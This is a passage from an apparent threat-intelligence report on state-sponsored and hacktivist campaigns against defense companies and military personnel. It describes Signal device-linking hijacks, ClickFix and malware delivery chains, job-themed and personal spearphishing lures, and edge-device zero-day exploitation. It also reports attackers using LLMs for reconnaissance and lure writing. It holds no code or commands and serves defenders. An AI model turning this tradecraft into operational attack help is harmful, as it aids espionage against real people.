objectives</span></a><span style="vertical-align: baseline;"> in the war against Ukraine and beyond is multifaceted. On a tactical level, targeting has broadened to include individuals in addition to organizations in order to support frontline operations and beyond, likely due at least in part to the reliance on public and off-the-shelf technology rather than custom products. Russian threat actors have targeted secure </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger"><span style="text-decoration: underline; vertical-align: baseline;">messaging</span></a><span style="vertical-align: baseline;"> </span><a href="https://open.spotify.com/episode/3reADyxut9u4ueSPlCma8I" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">applications</span></a><span style="vertical-align: baseline;"> used by the Ukrainian military to communicate and orchestrate military operations, including via attempts to exfiltrate locally stored databases of these apps, such as from mobile devices captured during Russia's ongoing invasion of Ukraine. This compromise of individuals' devices and accounts poses a challenge in various ways—for example, such activity often occurs outside spaces that are traditionally monitored, meaning a lack of visibility for defenders in monitoring or detecting such threats.</span><span style="vertical-align: baseline;"> GTIG has also identified attempts to compromise users of battlefield management systems such as Delta and Kropyva, underscoring the </span><a href="https://www.csis.org/analysis/does-ukraine-already-have-functional-cjadc2-technology" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">critical</span></a><span style="vertical-align: baseline;"> </span><a href="https://www.nytimes.com/2022/11/15/world/europe/ukraine-weapons.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">role</span></a><span style="vertical-align: baseline;"> played by these systems in the orchestration of tactical efforts and dissemination of vital intelligence. </span></p> <p><span style="vertical-align: baseline;">More broadly, Russian espionage activity has also encompassed the targeting of Ukrainian and Western companies supporting Ukraine in the conflict or otherwise focused on developing and providing defensive capabilities for the West. This has included the use of infrastructure and lures themed around military equipment manufacturers, drone production and development, anti-drone defense systems, and surveillance systems, indicating the likely targeting of organizations with a need for such technologies.</span></p> <h4><span style="vertical-align: baseline;">APT44 (Sandworm, FROZENBARENTS)</span></h4> <p><span style="vertical-align: baseline;">APT44, attributed by multiple governments to Unit 74455 within the <a href="https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf" rel="noopener" target="_blank">Russian Armed Forces' Main Intelligence Directorate (GRU)</a></span><span style="vertical-align: baseline;">, has attempted to exfiltrate information from Telegram and Signal encrypted messaging applications, likely via physical access to devices obtained during operations in Ukraine. While this activity extends back to at least 2023,</span><span style="vertical-align: baseline;"> we have continued to observe the group making these attempts.</span><span style="vertical-align: baseline;"> GTIG has also identified APT44 leveraging WAVESIGN, a Windows Batch script responsible for decrypting and exfiltrating data from Signal Desktop. Multiple governments </span><span style="vertical-align: baseline;">have also reported on APT44's use of INFAMOUSCHISEL, malware designed to collect information from Android devices including system device information, commercial application information, and information from Ukrainian military apps. </span></p> <h4><span style="vertical-align: baseline;">TEMP.Vermin</span></h4> <p><span style="vertical-align: baseline;">TEMP.Vermin, an espionage actor whose activity <a href="https://cert.gov.ua/article/37815" rel="noopener" target="_blank">Ukraine's Computer Emergency Response Team (CERT-UA)</a> has linked</span><span style="vertical-align: baseline;"> to security agencies of the so-called Luhansk People's Republic (LPR, also rendered as LNR), has deployed malware including VERMONSTER, SPECTRUM (publicly reported as Spectr), and FIRMACHAGENT via the use of lure content themed around drone production and development, anti-drone defense systems, and video surveillance security systems. Infrastructure leveraged by TEMP.Vermin includes domains masquerading as Telegram and involve broad aerospace themes including a domain that may be a masquerade of an Indian aerospace company focused on advanced drone technology.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig1.max-1000x1000.png" alt="Lure document used by TEMP.Vermin"> </a> <figcaption class="article-image__caption "><p data-block-key="fyr1z">Figure 1: Lure document used by TEMP.Vermin</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">UNC5125</span></h4> <p><span style="vertical-align: baseline;">UNC5125 has conducted highly targeted campaigns focusing on frontline drone units.</span><span style="vertical-align: baseline;"> Its collection efforts have included the use of a questionnaire hosted on Google Forms to conduct reconnaissance against prospective drone operators; the questionnaire purports to originate from Dronarium, a drone training academy, and solicits personal information from targets, notably including military unit information, telephone numbers, and preferred mobile messaging apps.</span><span style="vertical-align: baseline;"> UNC5125 has also conducted malware delivery operations via these messaging apps. In one instance, the cluster delivered the MESSYFORK backdoor (publicly reported as COOKBOX</span><span style="vertical-align: baseline;">) to an UAV operator in Ukraine.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig2.max-1000x1000.png" alt="UNC5125 Google Forms questionnaire purporting to originate from Dronarium drone training academy"> </a> <figcaption class="article-image__caption "><p data-block-key="cr53r">Figure 2: UNC5125 Google Forms questionnaire purporting to originate from Dronarium drone training academy</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">We also identified suspected UNC5125</span><span style="vertical-align: baseline;"> activity leveraging Android malware we track as GREYBATTLE, which was delivered via a website spoofing a Ukrainian military artificial intelligence company. GREYBATTLE, a customized variant of the Hydra banking trojan, is designed to extract credentials and data from compromised devices.</span></p> <p><span style="vertical-align: baseline;">Note: Android users with</span> <a href="https://support.google.com/googleplay/answer/2812853?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Play Protect</span></a><span style="vertical-align: baseline;"> enabled are protected against the aforementioned malware, and all known versions of the malicious apps identified throughout this report.</span></p> <h4><span style="vertical-align: baseline;">UNC5792</span></h4> <p><span style="vertical-align: baseline;">Since at least 2024, GTIG has identified this Russian espionage cluster exploiting secure messaging apps, targeting primarily Ukrainian military and government entities in addition to individuals and organizations in Moldova, Georgia, France, and the US. Notably, UNC5792 has </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger"><span style="text-decoration: underline; vertical-align: baseline;">compromised Signal accounts</span></a><span style="vertical-align: baseline;"> via the device-linking feature. Specifically, UNC5792 sent its targets altered "group invite" pages that redirected to malicious URLs crafted to link an actor-controlled device to the victim's Signal accounts allowing the threat actor to see victims’ message in real time. The cluster has also leveraged WhatsApp phishing pages and other domains masquerading as Ukrainian defense manufacturing and defense technology companies.</span></p> <h4><span style="vertical-align: baseline;">UNC4221</span></h4> <p><span style="vertical-align: baseline;">UNC4221, another suspected Russian espionage actor active since at least March 2022, has targeted secure messaging apps used by Ukrainian military personnel via tactics similar to those of UNC5792. For example, the cluster leveraged fake Signal group invites that redirect to a website crafted to elicit users to link their account to an actor-controlled Signal instance. UNC4221 has also leveraged WhatsApp phishing pages intended to collect geolocation data from targeted devices.</span></p> <p><span style="vertical-align: baseline;">UNC4221 has targeted mobile applications used by the Ukrainian military in multiple instances, such as by leveraging Signal phishing kits masquerading as Kropyva, a tactical battlefield app used by the Armed Forces of Ukraine for a variety of combat functions including artillery guidance.</span><span style="vertical-align: baseline;"> Other Signal phishing domains used by UNC4221 masqueraded as a streaming service for UAVs used by the Ukrainian military.</span><span style="vertical-align: baseline;"> The cluster also leveraged the STALECOOKIE Android malware, which was designed to masquerade as an application for Delta, a situational awareness and battlefield management platform used by the Ukrainian military, to steal browser cookies.</span></p> <p><span style="vertical-align: baseline;">UNC4221 has also conducted malware delivery operations targeting both Android and Windows devices. In one instance, the actor leveraged the "ClickFix" social engineering technique, which lured the target into copying and running malicious PowerShell commands via instructions referencing a Ukrainian defense manufacturer, in a likely attempt to deliver the TINYWHALE downloader. TINYWHALE in turn led to the download and execution of the MESHAGENT remote management software against a likely Ukrainian military entity.</span></p> <h4><span style="vertical-align: baseline;">UNC5976</span></h4> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Starting in January 2025, the suspected Russian espionage cluster UNC5976 conducted a phishing campaign delivering malicious RDP connection files. These files were configured to communicate with actor-controlled domains spoofing a Ukrainian telecommunications entity. Additional infrastructure likely used by UNC5976 included hundreds of domains spoofing defense contractors including companies headquartered in the UK, the US, Germany, France, Sweden, Norway, Ukraine, Turkey, and South Korea.</span></span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig3-white.max-1000x1000.png" alt="Identified UNC5976 credential harvesting infrastructure spoofing aerospace and defense firms"> </a> <figcaption class="article-image__caption "><p data-block-key="z1dmc">Figure 3: Identified UNC5976 credential harvesting infrastructure spoofing aerospace and defense firms</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Wider UNC5976 phishing activity also included the use of drone-themed lure content, such as operational documentation for the ORLAN-15 UAV system, likely for credential harvesting efforts targeting webmail credentials.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig4.max-1000x1000.png" alt="Repurposed PDF document used by UNC5976 purporting to be operational documentation for the ORLAN-15 UAV system"> </a> <figcaption class="article-image__caption "><p data-block-key="z1dmc">Figure 4: Repurposed PDF document used by UNC5976 purporting to be operational documentation for the ORLAN-15 UAV system</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">UNC6096</span></h4> <p><span style="vertical-align: baseline;">In February 2025, GTIG identified the suspected Russian espionage cluster UNC6096 conducting malware delivery operations via WhatsApp Messenger using themes related to the Delta battlefield management platform. To target Windows users, the cluster delivered an archive file containing a malicious LNK file leading to the download of a secondary payload. Android devices were targeted via malware we track as GALLGRAB, a modified version of the publicly available "Android Gallery Stealer". GALLGRAB collects data that includes locally stored files, contact information, and potentially encrypted user data from specialized battlefield applications.</span></p> <h4><span style="vertical-align: baseline;">UNC5114</span></h4> <p><span style="vertical-align: baseline;">In October 2023, the suspected Russian espionage cluster UNC5114 delivered a variant of the publicly available Android malware CraxsRAT masquerading as an update for the Kropyva app, accompanied by a lure document mimicking official installation instructions.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"> <h4><span style="vertical-align: baseline;">Overcoming Technical Limitations with LLMs</span></h4> <p><span style="vertical-align: baseline;">GTIG has recently discovered a threat group suspected to be linked to Russian intelligence services which conducts phishing operations to deliver CANFAIL malware primarily against Ukrainian organizations.</span><span style="vertical-align: baseline;"> Although the actor has targeted Ukrainian defense, military, government, and energy organizations within the Ukrainian regional and national governments, the group has also shown significant interest in aerospace organizations, manufacturing companies with military and drone ties, nuclear and chemical research organizations, and international organizations involved in conflict monitoring and humanitarian aid in Ukraine. </span></p> <p><span style="vertical-align: baseline;">Despite being less sophisticated and resourced than other Russian threat groups, this actor recently began to overcome some technical limitations using LLMs. Through prompting, they conduct reconnaissance, create lures for social engineering, and seek answers to basic technical questions for post-compromise activity and C2 infrastructure setup.</span><span style="vertical-align: baseline;">  </span></p> <p><span style="vertical-align: baseline;">In more recent phishing operations, the actor masqueraded as legitimate national and local Ukrainian energy organizations to target organizational and personal email accounts. They also imitated a Romanian energy company that works with customers in Ukraine, targeted a Romanian organization, and conducted reconnaissance on Moldovan organizations.</span><span style="vertical-align: baseline;"> The group generates lists of email addresses to target based on specific regions and industries discovered through their research. </span></p> <p><span style="vertical-align: baseline;">Phishing emails sent by the actor contain a lure that based on analysis appears to be LLM-generated, uses formal language and a specific official template, and Google Drive links which host a RAR archive containing CANFAIL malware, often disguised with a .pdf.js double extension.</span><span style="vertical-align: baseline;"> CANFAIL is obfuscated JavaScript which executes a PowerShell script to download and execute an additional stage, most commonly a memory-only PowerShell dropper.</span><span style="vertical-align: baseline;"> It additionally displays a fake “error” popup to the victim.</span></p> <span style="vertical-align: baseline;">This group’s activity has been documented by SentinelLABS and the Digital Security Lab of Ukraine in an October 2025 blog post detailing the “</span><a href="https://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">PhantomCaptcha</span></a><span style="vertical-align: baseline;">" campaign, where the actor briefly used ClickFix in their operations.</span></td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Hacktivist Targeting of Military Drones </span></h4> <p><span style="vertical-align: baseline;">A subset of pro-Russia hacktivist activity has focused on Ukraine’s use of drones on the battlefield. This likely reflects the critical role that drones have played in combat, as well as an attempt by pro-Russia hacktivist groups to claim to be influencing events on the ground. In late 2025, the pro-Russia hacktivist collective KillNet, for example, dedicated significant threat activity to this. After announcing the collective’s revitalization in June, the first threat activity claimed by the group was an attack allegedly disabling Ukraine’s ability to monitor its airspace for drone attacks</span><span style="vertical-align: baseline;">. This focus continued throughout the year, culminating in a December announcement in which the group claimed to create a multifunctional platform featuring the mapping of key infrastructure like Ukraine’s drone production facilities based on compromised data</span><span style="vertical-align: baseline;">. We further detail in the next section operations from pro-Russia hacktivists that have targeted defense sector employees.</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">2. Employees in the Crosshairs: Targeting and Exploitation of Personnel and HR Processes in the Defense Sector</span></span></h3> <p><span style="vertical-align: baseline;">Throughout 2025, adversaries of varying motivations have continued to target the "human layer" including within the DIB. By exploiting professional networking platforms, recruitment processes, and personal communications, threat actors attempt to bypass perimeter security controls to gain insider access or compromise personal devices. This creates a challenge for enterprise security teams, where much of this activity may take place outside the visibility of traditional security detections.</span></p> <h4><span style="vertical-align: baseline;">North Korea’s Insider Threat and Revenue Generation</span></h4> <p><span style="vertical-align: baseline;">Since at least 2019, the threat from the Democratic People’s Republic of Korea (DPRK) began evolving to incorporate internal infiltration via “IT workers” in addition to traditional network intrusion. This development, driven by both espionage requirements and the regime’s need for revenue generation, continued throughout 2025 with recent operations incorporating new publicly available tools</span><span style="vertical-align: baseline;">. In addition to public reporting, GTIG has also observed evidence of IT workers applying to jobs at defense related organizations.</span><span style="vertical-align: baseline;"> </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In June 2025, the US Department of Justice </span><a href="https://www.justice.gov/opa/pr/justice-department-announces-coordinated-nationwide-actions-combat-north-korean-remote" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">announced</span></a><span style="vertical-align: baseline;"> a disruption operation that included searches of 29 locations in 16 states suspected of being laptop farms and led to the arrest of a US facilitator and an </span><a href="https://www.justice.gov/usao-ma/pr/nine-charged-alleged-scheme-generate-revenue-north-korean-government-and-its-weapons" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">indictment</span></a><span style="vertical-align: baseline;"> against eight international facilitators. According to the indictment, the accused successfully gained remote jobs at more than 100 US companies, including Fortune 500 companies. In one case, IT workers </span><a href="https://www.justice.gov/opa/pr/justice-department-announces-coordinated-nationwide-actions-combat-north-korean-remote" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reportedly</span></a><span style="vertical-align: baseline;"> stole sensitive data from a California-based defense contractor that was developing AI technology</span><span style="vertical-align: baseline;">. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In 2025, a Maryland-based individual, </span><span style="vertical-align: baseline;">Minh Phuong Ngoc Vong, </span><span style="vertical-align: baseline;">was sentenced to 15 months in prison for their role in facilitating a DPRK ITW scheme. According to </span><a href="https://www.justice.gov/usao-md/pr/maryland-man-sentenced-conspiracy-commit-wire-fraud" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">government documents</span></a><span style="vertical-align: baseline;">, in coordination with a suspected DPRK IT worker, Vong was hired by a Virginia-based company to perform remote software development work for a government contract that involved a US government entity's defense program. The suspected DPRK IT worker used Vong’s credentials to log in and perform work under Vong’s identity, for which Vong was later paid, ultimately sending some of those funds overseas to the IT worker. </span></p> </li> </ul> <h4><span style="vertical-align: baseline;">The Industrialization of Job Campaigns </span></h4> <p><span style="vertical-align: baseline;">Job-themed campaigns have become a significant and persistent operational trend among cyber threat actors, who leverage employment-themed social engineering as a high-efficacy vector for both espionage and financial gain. These operations exploit the trust inherent in the online job search, application, and interview processes, masquerading malicious content as job postings, fake job offers, recruitment documents, and malicious resume-builder applications to trick high-value personnel into deploying malware or providing credentials. </span></p> <h5><span style="vertical-align: baseline;">North Korean Cyber Operations Targeting Defense Sector Employees </span></h5> <p><span style="vertical-align: baseline;">North Korean cyber espionage operations have targeted defense technologies and personnel using employment themed social engineering. GTIG has directly observed campaigns conducted by APT45, APT43, and UNC2970 specifically target individuals at organizations within the defense industry.  </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">GTIG identified a suspected APT45 operation leveraging the SMALLTIGER </span><span style="vertical-align: baseline;">malware to reportedly target South Korean defense, semiconductor, and </span><a href="https://asec.ahnlab.com/en/74039/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">automotive manufacturing</span></a><span style="vertical-align: baseline;"> entities. Based on historical activity, we suspect this activity is conducted at least in part to acquire intellectual property to support the North Korean regime in its research and development efforts in the targeted industries; South Korea's National Intelligence Service (NIS) has also </span><a href="https://www.reuters.com/world/asia-pacific/north-korea-broke-into-s-korean-chip-equipment-firms-seouls-spy-agency-says-2024-03-04/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reported</span></a><span style="vertical-align: baseline;"> on North Korean attempts to steal intellectual property toward the aims of producing its own semiconductors for use in its weapons programs.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">GTIG identified suspected APT43 infrastructure mimicking German and U.S. defense-related entities, including a credential harvesting page and job-themed lure content used to deploy the THINWAVE backdoor. Related infrastructure was also used by HANGMAN.V2, a backdoor used by APT43 and suspected APT43 clusters.</span><span style="vertical-align: baseline;">  </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">UNC2970 has consistently focused on defense targeting and impersonating corporate recruiters in their campaigns. The cluster has used Gemini to synthesize open-source intelligence (OSINT) and profile high-value targets to support campaign planning and reconnaissance. UNC2970’s target profiling included searching for information on major cybersecurity and defense companies and mapping specific technical job roles and salary information. This reconnaissance activity is used to gather the necessary information to create tailored, high-fidelity phishing personas and identify potential targets for initial compromise.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig5.max-1000x1000.png" alt="Content of a suspected APT43 phishing page"> </a> <figcaption class="article-image__caption "><p data-block-key="lwv07">Figure 5: Content of a suspected APT43 phishing page</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Iranian Threat Actors Use Recruitment-Themed Campaigns to Target Aerospace and Defense Employees</span></h4> <p><span style="vertical-align: baseline;">GTIG has observed Iranian state-sponsored cyber actors consistently leverage employment opportunities and exploit trusted third-party relationships in operations targeting the defense and aerospace sector. Since at least 2022, groups such as UNC1549 and UNC6446 have used spoofed job portals, fake job offer lures, as well as malicious resume-builder applications for defense firms, some of which specialize in aviation, aerospace, and UAV technology, to trick users/personnel into executing malware or giving up credentials under the guise of legitimate employment opportunities. </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">GTIG has identified fake job descriptions, portals, and survey lures hosted on UNC1549 infrastructure masquerading as aerospace, technology, and thermal imaging companies, including drone manufacturing entities, to likely target personnel interested in major defense contractors.</span><span style="vertical-align: baseline;"> Likely indicative of their intended targeting, in one campaign UNC1549 leveraged a spoofed domain for a drone-related conference in Asia. </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><a href="https://cloud.google.com/blog/topics/threat-intelligence/analysis-of-unc1549-ttps-targeting-aerospace-defense?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">UNC1549</span></a><span style="vertical-align: baseline;"> has additionally gained initial access to organizations in the defense and aerospace sector by exploiting trusted connections with third-party suppliers. The group leverages compromised third-party accounts to exploit legitimate access pathways, often pivoting from service providers to their customers. Once access is gained, UNC1549 has focused on privilege escalation by targeting IT staff with malicious emails that mimic authentic processes to steal administrator credentials, or by exploiting less-secure third-party suppliers to breach the primary target’s infrastructure via legitimate remote access services like Citrix and VMware. Post-compromise activities often include credential theft using custom tools like CRASHPAD and RDP session hijacking to access active user sessions. </span></p> </li> </ul> </ul> <p><span style="vertical-align: baseline;">Since at least 2022, the Iranian-nexus threat actor UNC6446 has used resume builder and personality test applications to deliver custom malware primarily to targets in the aerospace and defense vertical across the US and Middle East. These applications provide a user interface - including one likely designed for employees of a UK-based multinational aerospace and defense company - while malware runs in the background to steal initial system reconnaissance data.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig6.max-1000x1000.png" alt="Hiring-themed spear-phishing email sent by UNC1549"> </a> <figcaption class="article-image__caption "><p data-block-key="300r0">Figure 6: Hiring-themed spear-phishing email sent by UNC1549</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig7.max-1000x1000.png" alt="UNC1549 fake job offer on behalf of DJI, a drone manufacturing company"> </a> <figcaption class="article-image__caption "><p data-block-key="300r0">Figure 7: UNC1549 fake job offer on behalf of DJI, a drone manufacturing company</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">China-Nexus Actor Targets Personal Emails of Defense Contractor Employees</span></h4> <p><span style="vertical-align: baseline;">China-nexus threat actor APT5 conducted two separate campaigns in mid to late 2024 and in May 2025 against current and former employees of major aerospace and defense contractors. While employees at one of the companies received emails to their work email addresses, in both campaigns, the actor sent spearphishes to employees’ personal email addresses. The lures were meticulously crafted to align with the targets' professional roles, geographical locations, and personal interests. Among the professional, industry, and training lures the actor leveraged included: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Invitations to industry events, such as </span><span style="vertical-align: baseline;">CANSEC (Canadian Association of Defence and Security Industries), MilCIS (Military Communications and Information Systems), and SHRM (Society for Human Resource Management). </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;"> Red Cross training courses references.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Phishing emails disguised as job offers.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Additionally, the actor also leveraged hyper-specific and personal lures related to the locations and activities of their targetings, including: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Emails referencing a "Community service verification form" from a local high school near one of the contractor's headquarters.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Phishing emails using "Alumni tickets" for a university minor league baseball team, targeting employees who attended the university.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Emails purporting to be "open letters" to Boy Scouts of America camp or troop leadership, targeting employees known to be volunteers or parents.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Fake guides and registration information leveraging the 2024 election cycle for the state where the employees lived.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">RU Hacktivists Targeting Personnel </span></h4> <p><span style="vertical-align: baseline;">Doxxing remains a cornerstone of pro-Russia hacktivist threat activity, targeting both individuals within Ukraine’s military and security services as well as foreign allies. Some groups have centered their operations on doxxing to uncover members across specific units/organizations, while others use doxxing to supplement more diverse operations.</span></p> <p><span style="vertical-align: baseline;">For example, in 2025, the group Heaven of the Slavs (Original Russian: НЕБО СЛАВЯН) claimed to have doxxed Ukrainian defense contractors and military officials</span><span style="vertical-align: baseline;">; Beregini alleged to identify individuals who worked at Ukrainian defense contractors, including those that it claimed worked at Ukrainian naval drone manufacturers</span><span style="vertical-align: baseline;">; and PalachPro claimed to have identified foreign fighters in Ukraine, and the group separately claimed to have compromised the devices of Ukrainian soldiers</span><span style="vertical-align: baseline;">. Further hacktivist activity against the defense sector is covered in the last section of this report.</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">3. Persistent Area of Focus For China-Nexus Cyber Espionage Actors </span></h3> <p><span style="vertical-align: baseline;">The defense industrial base has been an important target for China-nexus threat actors for as long as cyber operations have been used for espionage. One of the earliest observed compromises attributed to the Chinese military’s </span><a href="https://services.google.com/fh/files/misc/mandiant-apt1-report.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">APT1</span></a><span style="vertical-align: baseline;"> group was a firm in the defense industrial sector in 2007. While historical campaigns by actors such as </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/apt40-examining-a-china-nexus-espionage-actor?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">APT40</span></a><span style="vertical-align: baseline;"> have at times shown hyper-specific focus in sub-sectors of defense, such as maritime related technologies, in general the areas of defense targeting from China-nexus groups has spanned all domains and supply chain layers. Alongside this focus on defense systems and contractors, Chinese cyber espionage groups have steadily improved their tradecraft over the past several years, increasing the risk to this sector. </span></p> <p><span style="vertical-align: baseline;">GTIG has observed more China-nexus cyber espionage missions directly targeting defense and aerospace industry than from any other state-sponsored actors over the last two years. China-nexus espionage actors have used a broad range of tactics in operations, but the hallmark of many operations has been their exploitation of edge devices to gain initial access. We have also observed China-nexus threat groups leverage </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks"><span style="text-decoration: underline; vertical-align: baseline;">ORB networks</span></a><span style="vertical-align: baseline;"> for reconnaissance against defense industrial targets, which complicates detection and attribution.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig8.max-1000x1000.png" alt="Edge vs. not edge 0-days likely exploited by CN actors 2021"> </a> <figcaption class="article-image__caption "><p data-block-key="81ess">Figure 8: Edge vs. not edge zero-days likely exploited by CN actors 2021 — September 2025</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Drawing from both direct observations and open-source research, GTIG assesses with high confidence that since 2020, Chinese cyber espionage groups have exploited more than two dozen zero-day (0-day) vulnerabilities in edge devices (devices that are typically placed at the edge of a network and often do not support EDR monitoring, such as VPNs, routers, switches, and security appliances) from ten different vendors. This observed emphasis on exploiting 0-days in edge devices likely reflects an intentional strategy to benefit from the tactical advantages of reduced opportunities for detection and increased rates of successful compromises.</span></p> <p><span style="vertical-align: baseline;">While we have observed exploitation spread to multiple threat groups soon after disclosure, often the first Chinese cyber espionage activity sets we discover exploiting an edge device 0-day, such as UNC4841, UNC3886, and UNC5221, demonstrate extensive efforts to obfuscate their activity in order to maintain long-term access to targeted environments. Notably, in recent years, both UNC3886 and UNC5221 operations have directly impacted the defense sector, among other industries. </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: 